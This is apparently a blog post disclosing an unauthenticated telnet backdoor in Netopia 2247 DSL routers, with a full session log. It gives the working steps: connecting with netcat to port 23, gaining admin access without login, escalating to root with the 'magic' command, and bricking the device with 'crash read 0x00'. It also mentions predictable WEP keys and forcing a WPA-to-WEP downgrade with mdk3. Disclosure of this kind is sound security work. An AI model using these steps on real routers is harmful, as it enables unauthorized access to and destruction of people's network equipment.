Revisiting the Netopia Unauthenticated TELNET backdoor vulnerability and "stupidly easy privilage escalation".
So I used netcat to connect to port 23 on the router and was greeted with a nice telnet console, as expected.
The initial access was administrative, but the command "magic" gives a root shell, allowing you a few extra commands - notably the "crash" command. (to brick the box, "crash read 0x00" works well!)
So to recap, we have the following vulnerabilities...
> Unauthenticated TELNET login backdoor
> Un protected administrative provilages
> Privilage escalation "admin to root"
> Denial of service vulnerability (brick it)
Now that is not all - the WEP key generation algorithm on these is notoriously bad, and is predictable based on the SSID - notably the Eircom ones. In the lab I was able to use mdk3 to force a Netopia router to "downgrade" from WPA to WEP.
So now we also have a "security fucking up" vulnerability to add to the pot...
Here is the log of the accessing and privilage escalation, I then typed "help" and quit.
root@bt:~# nc 192.168.1.254 23
�� �� ��
Terminal shell v1.0
Copyright �2006 Netopia, Inc. All rights reserved.
Netopia Model 2247-02 High-Power Wireless DSL Ethernet Managed Switch
Running Netopia SOC OS version 7.7.0 (build r6)
Multimode ADSL Capable
(Admin completed login: Full Read/Write access)
Netopia-2000/28176900> magic
magic
(poof!)
Netopia-2000/28176900# help
help
arp to send ARP request
atmping to send ATM OAM loopback
brcm to read/write broadcom switch
clear to erase all stored configuration information
clear_certificate to clear stored SSL certificate
clear_log to clear stored log data
configure to configure unit's options
diagnose to run self-test
download to download config file
exit to quit this shell
help to get more: "help all" or "help help"
hotspot to set or show hotspot authentication info
install to download and program an image into flash
loopback to set the interface in loopback mode
license to enter an upgrade key to add a feature
log to add a message to the diagnostic log
loglevel to report or change diagnostic log level
netstat to show IP information
nslookup to send DNS query for host
ping to send ICMP Echo request
quit to quit this shell
reset to reset subsystems
restart to restart unit
rma_count to perform RMA functions
show to show system information
sslclient to send HTTPS request to the Server. Default Port is 433
start to start subsystem
status to show basic status of unit
telnet to telnet to a remote host
traceroute to send traceroute probes
upload to upload config file
view to view configuration summary
ata to all Remote Config of ATA's related cmds
who to show who is using the shell
bootflags to show or set the bootflags
checksum to calculate and display the cksums
console to make this session the console
mem to display or edit system memory
trace to toggle routing tracing
crash to cause system death
adsldebug to debug commands
dsm to DSM commands
set_language to set web display language
peer-address to print IP address of this shell user
? to get help: "help all" or "help help"
Netopia-2000/28176900# quit
quit
Goodbye.
~ This info is for educational and academic and such non evil uses only.
I aint responsible for your misdeeds.
No comments:
Post a Comment